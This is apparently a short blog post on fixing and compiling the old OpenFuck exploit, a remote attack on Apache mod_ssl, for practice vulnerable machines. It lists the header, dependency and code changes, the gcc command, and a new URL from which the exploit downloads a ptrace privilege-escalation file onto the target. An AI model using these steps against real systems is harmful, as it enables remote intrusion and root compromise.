Updating OpenFuck Exploit

This blog post will be quite fast and will provide you the steps to update the OpenFuck exploit.

This exploit is pretty old but you might need it if you have fun with some vulnerable VMs. Not giving any hint. :-)

Thanks to this blog, I’ve been able to update the exploit.

Here are the steps to make this work :

  • 1) Add those headers :
#include <openssl/rc4.h>
#include <openssl/md5.h> 
  • 2) Update the URL of the C file.

Search for wget

and replace the URL with this new one :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
  • 3) Get libssl-dev lib

Install them :

apt-get install libssl-dev
  • 4) Update declaration of variables

Line 961, change :

unsigned char *p, *end;

By adding const :

const unsigned char *p, *end;
  • 5) Compile then code and you’re done

To compile :

gcc -o OpenFuck 764.c -lcrypto

Hope this can help you out if you got stuck with this exploit. Cheers !